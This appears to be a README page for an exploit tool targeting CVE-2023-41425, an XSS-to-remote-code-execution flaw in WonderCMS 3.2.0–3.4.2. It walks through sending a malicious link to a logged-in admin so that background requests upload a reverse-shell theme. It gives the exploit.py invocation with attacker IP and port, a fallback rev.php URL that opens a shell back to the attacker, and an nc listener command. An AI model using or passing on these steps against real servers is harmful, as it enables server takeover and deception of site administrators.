Share
## https://sploitus.com/exploit?id=2F4E3DBE-F5A4-5CC2-9DED-5A6FC9264EA6
# CVE-2023-41425-WonderCMS-Authenticated-RCE
## Description 
WonderCMS v3.2.0 - v3.4.2 is vulnerable. Remote attackers can take full control of the server using a Cross-Site Scripting (XSS) exploit (For educational purposes only ). Here's the game plan:

## How it works:
The exploit abuses the installModule component of WonderCMS to sneak a crafted script that runs arbitrary code.

## The Setup
* Tool: exploit.py
* What You Need:
  - Target URL where WonderCMS is installed (no admin password required).
  - Your attacker's machine IP.
  - A port for your reverse shell listener.
## Step-by-Step Execution
1. The script generates a file called xss.js. This JavaScript weapon is designed to exploit reflected XSS.
2. It spits out a malicious link. You’ll send that to the admin.
3. The magic happens when the admin (a logged-in user) opens or clicks your link:
  - Background requests fire without their consent.
  - A reverse shell payload is uploaded using the theme/plugin upload feature.
4. Once uploaded, the payload executes and grants you a reverse shell connection straight to the target server.

```sh
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
```
Example

```sh
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

```

## Fail-Safe:
If the reverse shell doesn’t trigger automatically, just head over to:
```sh
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
```

## note:
Remember start a listener using the following command:
  ```sh
  nc -lvp 4444
  ```  

## Credit
prodigiousMind for discovering and reporting the vulnerability https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413